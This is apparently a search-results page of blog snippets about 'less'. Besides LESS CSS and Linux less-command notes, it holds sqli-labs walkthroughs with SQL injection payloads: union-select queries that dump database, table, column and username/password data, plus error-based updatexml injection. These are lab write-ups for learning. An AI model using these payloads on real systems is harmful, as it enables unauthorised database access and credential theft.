精华内容
下载资源
问答
  • 9.28 less

    2015-09-29 21:06:11
    less变量声明通过@+变量名,后面跟css类型的值或其他变量的值; 变量的使用:只需将变量名写在css属性后面即可 变量的值参与计算:变量可以直接与 ,减,乘,除运算 作用域:作用域是程序中的
    LESS
    1-语法

        <link rel="stylesheet/less" type="text/css" href="styles.less">
        <script src="less.js" type="text/javascript"></script>
         less.js文件必须在引入的less文件之后
        引入less文件事rel的值必须为 stylesheet/less
    2-变量
    less变量声明通过@+变量名,后面跟css类型的值或其他变量的值;
    变量的使用:只需将变量名写在css属性后面即可
    变量的值参与计算:变量可以直接与 加,减,乘,除运算
    作用域:作用域是程序中的一个标准,LESS中也是。如果你在你样式表的root级声明一个变量,它在整个文档中都是可以调用的。然而,如果你在一个选择器,比如id或者class中,重新定义了这个变量,那么,它就只能在这个选择器中可用了——当然是重新定义后的新值。
    3函数
        “.”不能少必须加不能少
        类名和css类名命名规则相同
        参数列表和变量声明一样,可带默认值
        css申明可以用参数也可用常量值
    4类
        以使用@arguments来引用所有传入的变量
        使用参数的控制位来控制相同的类输出不同的样式
        可以在类函数定义时候使用条件判断(, and)
    5嵌套规则
        #site-body { …
          .post { …
        .post-header { …
              h2 { … }
              a { …
                &:visited { … }
                &:hover { … }
               }
             }
            }
        }
    6注解
    这一部分比较基础。LESS中允许两种注释写法。标准的CSS注释,/* comment */,是有效的,而且能够通过处理并正确输出。当行注释,// comment,同样可以用但是不能够通过处理也不能被输出,然后,结果是,“无声的”。
    展开全文
  • Less_02--Less_04

    2020-02-27 18:54:22
    发现注入点(在参数后面加 ’ 查看页面是否报错,因为无论是字符型还是数字型,都会因为单引号个数不匹配而报错的) 判断sql注入的类型,测试了 ?id=1 and 1=1 页面正常 ?id=1 and 1=2 页面报错 所以判定这个sql注入...

    Less-2

    发现注入点(在参数后面加 ’ 查看页面是否报错,因为无论是字符型还是数字型,都会因为单引号个数不匹配而报错的)
    在这里插入图片描述判断sql注入的类型,测试了
    ?id=1 and 1=1 页面正常
    ?id=1 and 1=2 页面报错

    所以判定这个sql注入为数字型
    在这里插入图片描述
    因为在前面就做过后面的的了,这里就简单写一下:
    测量字段:?id=-1 order by x
    查看当前的数据库和版本:?id=-1 union select 1,database(),version()
    查看当前的数据库的表名:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”
    查看当前的数据库的users表中的列名:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”
    爆破username和password的数据:?id=-1 union select 1,group_concat(username,‘X’,password),3 from users

    Less_03

    正常来,首先在参数后面加个单引号 ’ 页面也报错了。
    在这里插入图片描述
    我们看看报错:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
    是可以看到是有个 )没有闭合,那么我将他闭合并配合 and 1=1 看到回显一样的[?id=1’) and 1=1],想到这里,就是后面的没有的括号没有闭合,所以就应该想到去将他注释掉,让sql语句正常执行。后面在这前面两个条件不变的情况下,去测试 and 1=2,页面报错,所以可以猜测源代码是$_GET=('$ID')的形式。
    在这里插入图片描述
    后面就是正常的猜字段长度,找数据库名,表名,列名,以及最后的爆破字段。(这里就不写了,都是一样的)
    最后是完成了,我们在去看看源代码,验证一下自己的猜测:
    在这里插入图片描述

    Less_04

    开启新的关卡,发现在参数后加单引号页面正常回显,但是双引号就报错了。
    在这里插入图片描述看一下报错内容:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
    其中的括号就是和Less_03是一样的意思,但是这里是双引号闭合。猜测源代码是$_GET=("$ID") 这样的形式。 就继续测试:其中 ?id=1") and 1=1 %23 正常回显 ?id=1") and 1=2 %23 页面报错
    所以就继续的去猜字段长度,找数据库名,表名,列名,以及最后的爆破字段。(这里就不写了,都是一样的)
    在这里插入图片描述完成了,在去看看源代码吧,不知道前面对不对。。
    在这里插入图片描述

    展开全文
  • sqli-labs (less1-less4)

    千次阅读 2018-07-24 16:33:30
    就只是随便记一记 ...这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...

    就只是随便记一记

    less 1

    get方法的引号闭合

    id=1'有报错,证明有注入点,然后接下来是看一下有多少列

    ?id=-1' union select 1,2,3--+'

    这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来

    剩下的就是爆数据库,表,字段,值了

    爆数据库

    ?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+' 因为选出来的数据库可能会有很多个,用group_concat连起来显示出来,同时id=-1无法查询到东西,就会显示后面的数据

    爆表

    ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+'

    爆字段

    ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+'

    爆值

    ?id=-1' union select 1,concat(username,'@@',password),3 from users where username="admin"--+'

    admin的username和password用@@去分隔

    到这里,我们就可以拿到admin的账号和密码了

    来多一个组合技能

    ?id=0' union select 1,2,group_concat(concat_ws(char(32,58,32),id,username,password)) from users %23

    less 2

    get方法整数查询

    这里我们按照刚刚的直接在id=1后面加个单引号发现会报错,为了看得更清楚一点,我们的参数这样写

    ?id=1!'!----

    这个时候可以看见,两个感叹号中间夹着的单引号其实是没有跟我们想象的前面的单引号闭合的,所以,其实他的查询语句不是less 1的 select xxx from "table_name" where id='$_GET[id]',而是select xxx from "table_name" where id=$_GET[id],可以看见,这两个语句的差别只是一个id有单引号括着,一个没有,但是没有的话,就证明其实他是接收的是一个整数,而不是字符串

    再试一下?id=1--+

    发现后面的语句全部注释掉了,回显正常,确实接收的是一个整数

    接下来就跟刚刚差不多,用?id=-1 union select 1,2,3--+或者?id=1 order by 3--+去看一下是几列

    然后暴库-->表-->字段-->值-->拿到后台管理员密码,截图不放了,参数给一给

    ?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+

    ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+

    ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"--+

    ?id=-1 union select 1,concat_ws('@@',username,password),3 from users where username="admin"--+

    less 3

    get方法单引号变形字符串注入

    ?id=1'会报错,然后?id=1''又没有报错

    可以看到单引号和右括号,所以其实语句应该是select xxx from "table_name" where id = ('$_GET["id"]')

    传过来的id有限制,有右括号和单引号括着,所以闭合有两点,一个单引号另一个右括号

    payload构造 ?id=1') --+ 传过去就可以变成 id = ('1') --+') ,然后后面的都注释掉了,所以都能绕过,最后的payload

    ?id=-1') union select 1,2,group_concat(concat_ws(char(32,58,32),id,username,password)) from users --+

    less 4

    get方法双引号变形字符串注入

    ?id=1'正常回显,?id=1"会报错

    其实跟less 3差不多,只是单引号变成了双引号,查询语句是

    select xxx from "table_name" where id = (" $_GET["id"] ")

    ?id = 1") --+就能绕过闭合

    最终payload

    ?id=-1") union select 1,2,group_concat(concat_ws(char(32,58,32),id,username,password)) from users --+

    展开全文
  • less】命令行编译

    2018-11-24 10:18:00
    用命令行编译,需要先把环境配置好。 环境配置教程:【less】环境搭建 【第1步】 win + r, 输入cmd ...微信订阅号:Rabbit_svip ...选择盘符后,后面冒号。 然后 用cd命令,进入对应目录 cd prac...
        

    用命令行编译,需要先把环境配置好。

    环境配置教程:【less】环境搭建


    【第1步】

    win + r,
    输入cmd

    7275569-8dc37967f89e874e
    微信订阅号:Rabbit_svip

    【第2步】
    进入你存放less的位置。


    7275569-34821fdb4a69f111
    微信订阅号:Rabbit_svip

    首先是先选择盘符,比如 h:
    选择盘符后,后面要加冒号。

    然后 用cd命令,进入对应目录

    cd practice\less\less
    

    【第3步】
    用less的命令进行编译


    7275569-810ff1bc0544703c
    微信订阅号:Rabbit_svip
    lessc index.less index.css
    

    首先输入 lessc注意,less后面有’c’

    然后找到你写好的less文件,我这里是index.less

    然后转换成你想输出的css,名字可以自定义。

    回车之后,它就会转换成css文件了。







    最后,还有一个好玩的命令,就是把less转换成压缩过的css。

    命令是

    lessc index.less index.css -x
    

    注意,在上一句命令行后面加了 “ -x ”

    展开全文
  • sqli-labs之less1

    2019-01-05 15:17:04
    在看别人的博客的基础上自己了些修改 sql-labs之less1 打开题目我们可以看到这样的界面 一、我们先尝试下看是不是get获取请求方式。 在地址栏后面加上?id=1;发现结果是我们所预料的get方式。 ...
  • Less中直接在属性后面加hack写法会编译报错的。那么怎么解决呢? 第一种方式: IE7 以display:inline-block为例: less的hack写法: .box{ display: inline-block; *display:inline; *zoom: 1; } 编译出来的结果...
  • Sqlilabs Less 1-4

    2021-03-29 09:10:15
    Sqlilabs Less 1-4 practice makes perfect 熟能生巧! Less 1 GET - Error based - ...%23 因为编码问题’#‘就是’%23’ 在最后#号注释掉最后面的语句 直接联合查询 发现2,3处可以显示 获取库名及基本信息,-1
  • sqli-labs less4 学习过程

    2020-09-20 11:51:58
    根据报错给的信息 推测id=("$id") 所以后面单括号 使用 1") 测试 回显正常 接着判断回显位 再爆出数据库名称 sqli-labs的日常security 所以后面就非常简单了 得到表名 获取列名 接着就是爆数据 ...
  • Less中直接在属性后面加hack写法会编译报错的。那么怎么解决呢? 第一种方式: IE7以display:inline-block为例: less的hack写法: .box{ display: inline-block; *display:inline; *zoom: 1; } ...
  • 首先看网站还是要求输入id获取内容,输入单引号测试网站,发现输出结果一致。...有正常的结果显示,接下来在后面加注入语句。 /sql/Less-4/?id=1") and updatexml(1,concat(0x7e,(select user()),0x7e),1)--
  • sqli-labs的less-1

    2021-06-03 06:54:10
    判断注入点通常我们会在参数后面加',",/,)等四种形式判断注入点![在这里插入图片描述](https://img-blog.csdnimg.cn/20210603071616246.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text...
  • order by 注入 Less 46-53

    2020-08-18 14:24:47
    1、后面跟一个数字(构造 order by 后的一个语句,让该语句执行结果为一个数)。 直接添加注入语句,?sort=(select ******) 2、?sort=rand(sql 语句) ?sort=rand(true) ?sort=rand(false) 3、利用 and,例如?sort=1 ...
  • // 函数后面分号 .testfn(){ // 返回变量 或 类名 @color: red .background-color{ background-color: white } } .testfn1(); .testfn1(@var1:1){ // 参数默认值 @color: red .background-co
  • 2、/你要查找的内容(/NullPointException)注意,/后面没有空格,直接就你要查找的内容,回车后,会高亮显示这个内容(如果找得到的话)3、n往下继续查找匹配的内容4、N往上查找匹配的崆5、q退出
  • 1. Less-1 GET-Error based - Single quotes - String(GET单引号字符型注入) ...http://192.168.200.174/sqli-labs-master/Less-1/?id=1 #输入单引号后报错 ...盲猜漏洞类型时可以在后面加and 1=1,and 1=2分别查看
  • Less-32 Bypass custom filter adding slashes to dangerous chars 手工注入 ...知道这个前面%df就好,后面的和其它一样就不继续写了。 话说,32关JSP也有阿,但是就是一个普通的单引号的闭合。。...
  • 这个题目,打开网页显示输入一个整数id作为参数,输入id=1打开页面查看,显示出了一个名字和密码,在1后面加单引号测试一下看会不会出错。 可以看到报了一个语法错误。接下来再尝试在后面跟 and 1=1#和and 1=2# ...
  • Less 7 GET - Dump into outfile - String 从题目来看的话是有关写入文件的注入了,打开题目构造参数访问看看 先添加单引号测试 出错了说明参数确实是单引号包裹的,但是这里没有具体的报错信息,还是要靠...
  • 首先还是看网页提示输入id测试,输入id后单引号看有什么输出。 payload /sql/Less-3/?id=1' 可以看到报错,报错在1后面有一个括号,换一个payload试一下。 payload /sql/Less-3/?id=1') --+ 可以看到...
  • important 关键字 在调用 mixin 的圆括号后面添加!important,编译出来的属性都会带上!important 5.mixin 参数 可以在 mixin 圆括号里面传递参数,参数的形式是@Parmas 。 可以设置默认参数,参数的形式是@Parmas: 5...
  • sqli-labs less1 学习笔记

    2017-10-28 09:10:24
    id=1尝试在1后面加' 发现报错从上述错误当中,我们可以看到提交到sql中的1'在经过sql语句构造后形成 '1'' LIMIT 0,1,多加了一个 ' 。这种方式就是从错误信息中得到我们所需要的信息,那我们接下来想如何将多余的 ' ...
  • 1.引用bg-image书写前要下图的点号,不然会报错 2.icon和&.后面的class为同一标签的class Vue组件引入less文件,图片路径问题 less函数存放和使用文件位置介绍 错误写法 这样写,在m-header文件中直接相对m...
  • Less-20 cookie头注入 **Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或...
  • 下面分享我最常使用的命令 | grep 管道和grep是常用的组合,...find 后面加你要查询的目录 grep 后面加你要 查询文件的关键字 find /home |grep test.py 3. 查询历史命令 查询历史命令中包括Python 的命令 history...
  • 堆叠注入即在语句后分号;结束一个sql语句后继续构造第二个语句从而达到一起执行的目的。 和联合查询的区别 联合查询的语句类型的有限的,只能执行查询语句,而堆叠注入可以执行任意的语句——union后只能跟select...
  • 常用命令:cat (查看一个文件的内容并显示在屏幕上,后面可以不任何选项直接跟 文件名)。【1】-n : 查看文件时,把行号也显示到屏幕上。例: # echo '11111111'>dirb/filee # echo '22222222'>>dirb/...
  • 最常用的是cat,more及less。此外,如果要查看一个很大的文件(好几百MB),但是我们只需要后面的几行字,这要使用tail,tac指令也可以用于这个目的。 cat 由第一行开始显示文件内容 语法:cat [-AbeEnstTuv...
  • 另外cat后面也可以不文件,这样就是从标准输入读取数据。 优点:能够连接多个文件 缺点:由于内容是一下全部dump到屏幕上的,如果内容很多超过一屏,由于无法翻页,前面的内容将无法查看。 ...
  • //可以将后面的条件(对象)冒泡到根标签 color: green; @media (min-width: 768px){ //@media嵌套时,内部的条件(对象)要小括号 background-color:red; } } @media tv{ color: black; } } 无...

空空如也

空空如也

1 2 3 4 5
收藏数 84
精华内容 33
关键字:

后面加less